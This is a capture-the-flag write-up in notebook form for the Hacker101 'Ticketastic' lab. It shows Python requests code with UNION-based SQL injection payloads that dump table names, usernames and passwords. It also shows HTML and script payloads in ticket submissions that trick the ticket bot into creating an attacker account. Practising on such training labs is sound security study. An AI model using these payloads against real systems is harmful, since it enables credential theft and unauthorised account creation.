# Ticketastic - Captured flags 2/2

In [ ]:
import requests

url = "https://54a3403cf5df6edbefd9f244f946686c.ctf.hacker101.com/" # Home page

session = requests.Session()

## 1° Flag caught

### Demo instance's exploration

In [ ]:
# Get the home page
response = session.get(url)
print(response.text)
# Cookies
print(session.cookies.get_dict())
# Headers
print(response.headers)

Home page: 
```html
<!doctype html>
<html>
	<head>
		<title>Ticketastic Deluxe - Home</title>
	</head>
	<body>
		<h1>Welcome to Ticketastic</h1>
		<p><a href="newTicket">Submit a Ticket</a> | <a href="login">Admin Login</a></p>
		<h2>Demo Instance</h2>
		<p>Before you choose to purchase Ticketastic for your organization, feel free to give this demo instance a try.  All functionality is exposed, simply log in with admin/admin.  If you have any problems, put in a ticket on our official instance -- only the knowledgebase bot looks at the tickets submitted here.</p>
	</body>
</html>
```

Cookies: {}
Headers: {'Date': 'Sun, 27 Apr 2025 09:52:59 GMT', 'Content-Type': 'text/html; charset=utf-8', 'Content-Length': '565', 'Connection': 'keep-alive', 'Server': 'openresty/1.27.1.2'}

In [ ]:
# newTicket page
response = session.get(url + "newTicket")
print(response.text)

# login page
response = session.get(url + "login")
print(response.text)

NewTicket page:
```html
<!doctype html>
<html>
	<head>
		<title>Ticketastic Deluxe - Submit Ticket</title>
	</head>
	<body>
		<h1>Submit Ticket</h1>
		<form method="POST">
			Title: <input type="text" name="title"><br>
			Body: <textarea cols="25" rows="5" name="body"></textarea><br>
			<input type="submit" value="Submit">
		</form>
	</body>
</html>
```

Login page:
```html
<!doctype html>
<html>
	<head>
		<title>Ticketastic Deluxe - Login</title>
	</head>
	<body>
		<h1>Admin Login</h1>
		<form method="POST">
			Username: <input type="text" name="username"><br>
			Password: <input type="password" name="password"><br>
			<input type="submit" value="Login">
		</form>
	</body>
</html>
```

In [ ]:
# I know that the username is "admin" and the password is "admin" from the home page
response = session.post(url + "login", data={"username": "admin", "password": "admin"})
print(response.text)
# Cookies
print(session.cookies.get_dict())

Admin page:
```html
<!doctype html>
<html>
	<head>
		<title>Ticketastic Deluxe - Admin</title>
	</head>
	<body>
		<h1>Admin Home</h1>
		<a href="newUser">Create a new user</a>
		<h2>Pending Tickets</h2>
		<ul>
		
			<li><a href="ticket?id=1">Example Ticket</a></li>
		
		</ul>
	</body>
</html>
```

Custom cookie: {'session_level7a': 'eyJ1c2VyIjoiYWRtaW4ifQ.Gu-TLw.uaGqWr_JmcGxRAN3kmhtQ3WTiVM'}

In [ ]:
# New user page
response = session.get(url + "newUser")
print(response.text)

# Ticket page (id=1)
response = session.get(url + "ticket?id=1")
print(response.text)


New user page:
```html
<!doctype html>
<html>
	<head>
		<title>Ticketastic Deluxe - New User</title>
	</head>
	<body>
		<h1>New User</h1>
		<form method="GET">
			Username: <input type="text" name="username"><br>
			Password: <input type="password" name="password"><br>
			Repeat password: <input type="password" name="password2"><br>
			<input type="submit" value="Create">
		</form>
	</body>
</html>
```

Ticket page for id=1
```html
<!doctype html>
<html>
	<head>
		<title>Ticketastic Deluxe - Ticket "Example Ticket"</title>
	</head>
	<body>
		<h1>Example Ticket</h1>
		<pre>This is your ordinary, run of the mill ticket.  If any errors occurred during processing -- for instance, if the user gives a bad link -- these will be noted here.</pre>
		<h2>Our Reply</h2>
		<i>No reply yet</i>
	</body>
</html>
```

In [ ]:
# Get an invalid id
response = session.get(url + "ticket?id='")
print(response.text)


Error obtained:
```python
Traceback (most recent call last):
  File "./main.py", line 78, in ticket
    cur.execute('SELECT title, body, reply FROM tickets WHERE id=%s' % request.args['id'])
  File "/usr/local/lib/python2.7/site-packages/MySQLdb/cursors.py", line 255, in execute
    self.errorhandler(self, exc, value)
  File "/usr/local/lib/python2.7/site-packages/MySQLdb/connections.py", line 50, in defaulterrorhandler
    raise errorvalue
ProgrammingError: (1064, "You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''' at line 1")
```

In [ ]:
# Get the number of tickets in the database
response = session.get(url + "ticket?id=0 union select count(*), count(*), count(*) from tickets;--")
print(response.text)


Output:
```html
<!doctype html>
<html>
	<head>
		<title>Ticketastic Deluxe - Ticket "1"</title>
	</head>
	<body>
		<h1>1</h1>
		<pre>1</pre>
		<h2>Our Reply</h2>
		<pre>1</pre>
	</body>
</html>
```

I can infer that there is a single row in the table.

In [ ]:
# Get the names of the tables in the database
response = session.get(url + "ticket?id=0 union SELECT GROUP_CONCAT(TABLE_NAME SEPARATOR '') AS concatenated_table_names, COUNT(*), COUNT(*) \
FROM information_schema.tables \
WHERE TABLE_SCHEMA = DATABASE()--")
print(response.text)


Response:
```html
<!doctype html>
<html>
	<head>
		<title>Ticketastic Deluxe - Ticket "ticketsusers"</title>
	</head>
	<body>
		<h1>ticketsusers</h1>
		<pre>2</pre>
		<h2>Our Reply</h2>
		<pre>2</pre>
	</body>
</html>
```

I can infer that there are 2 tables in the database. They are respectively called: tickets and users.

In [ ]:
# Get the names of the tables in the database
response = session.get(url + "ticket?id=0 union SELECT GROUP_CONCAT(username SEPARATOR '') AS concatenated_table_names, COUNT(*), COUNT(*) \
FROM users--")
print(response.text)


Response:
```html
<!doctype html>
<html>
	<head>
		<title>Ticketastic Deluxe - Ticket "admin"</title>
	</head>
	<body>
		<h1>admin</h1>
		<pre>1</pre>
		<h2>Our Reply</h2>
		<pre>1</pre>
	</body>
</html>
```

Only the user admin is available by default.

In [ ]:
# Try to create a new user
response = session.get(url + "newUser?username=ciao&password=ciao&password2=ciao")
response = session.post(url + "login", data={"username": "ciao", "password": "ciao"})
print(response.text)

Home page of the user 'ciao' is the same of the admin user.

Home page:
```html
<!doctype html>
<html>
	<head>
		<title>Ticketastic Deluxe - Admin</title>
	</head>
	<body>
		<h1>Admin Home</h1>
		<a href="newUser">Create a new user</a>
		<h2>Pending Tickets</h2>
		<ul>
		
			<li><a href="ticket?id=1">Example Ticket</a></li>
		
		</ul>
	</body>
</html>
```

### Live instance's exploration

I know that the admin user is not associated with the admin password. So, I want to create a new user under my control. To do so, I need to fool the bot used to handle the tickets. To do that I will try to submit a fake ticket that will force the creation of a new user.

In [ ]:
# Create a new ticket
title='<a href="http://localhost/newUser?username=test&password=test&password2=test">TEST</a>'
response = session.post(url + "newTicket", data={"title": title, "body": title})
print(response.text)

# Login with test:test
response = session.post(url + "login", data={"username": "test", "password": "test"})
print(response.text)


Homepage of the test user:
```html
<!doctype html>
<html>
	<head>
		<title>Ticketastic Deluxe - Admin</title>
	</head>
	<body>
		<h1>Admin Home</h1>
		<a href="newUser">Create a new user</a>
		<h2>Pending Tickets</h2>
		<ul>
		
			<li><a href="ticket?id=1">Flag Won't Work</a></li>
		
			<li><a href="ticket?id=2"><script> fetch('/newUser?username=ciaociao&password=ciaociao&password2=ciaociao')   .then(r=>r.text()).then(console.log).catch(console.error); </script></a></li>
		
			<li><a href="ticket?id=3"><a   href="/newUser?username=ciaociao&password=ciaociao&password2=ciaociao">   Crea utente </a></a></li>
		
			<li><a href="ticket?id=4"><a   href="/newUser?username=ciaociao2&password=ciaociao&password2=ciaociao">   Crea utente </a></a></li>
		
			<li><a href="ticket?id=5">ref="http://localhost/newUser?username=test&password=test&password2=test">TEST</a></a></li>
		
			<li><a href="ticket?id=6"><a href="http://localhost/newUser?username=test&password=test&password2=test">TEST</a></a></li>
		
			<li><a href="ticket?id=7"><a href="http://localhost/newUser?username=test&password=test&password2=test">TEST</a></a></li>
		
		</ul>
	</body>
</html>
```

I think to have just found the first flag. Let's read the first ticket.

In [ ]:
# Read the ticket with id=1
response = session.get(url + "ticket?id=1")
print(response.text)

Response:
```html
<!doctype html>
<html>
	<head>
		<title>Ticketastic Deluxe - Ticket "Flag Won't Work"</title>
	</head>
	<body>
		<h1>Flag Won't Work</h1>
		<pre>I got the flag ^FLAG^...WRONG...$FLAG$ but the site rejects it.  Any thoughts?</pre>
		<h2>Our Reply</h2>
		<pre>Yeah, the correct flag is ^FLAG^...$FLAG$.  Let me know if you have any problems!</pre>
	</body>
</html>
```

## 2° Flag caught

For the second flag I want to exploit the SQL vulnerability. Firstly, I want to know the admin's password.

In [ ]:
response = session.get(url + "ticket?id=0 union SELECT GROUP_CONCAT(password SEPARATOR '') AS concatenated_table_names, COUNT(*), COUNT(*) \
FROM users--")
print(response.text)

Response:
```html
<!doctype html>
<html>
	<head>
		<title>Ticketastic Deluxe - Ticket "^FLAG^...$FLAG$test"</title>
	</head>
	<body>
		<h1>^FLAG^...$FLAG$test</h1>
		<pre>4</pre>
		<h2>Our Reply</h2>
		<pre>4</pre>
	</body>
</html>
```

Fortunately, the password of the admin user is the second flag!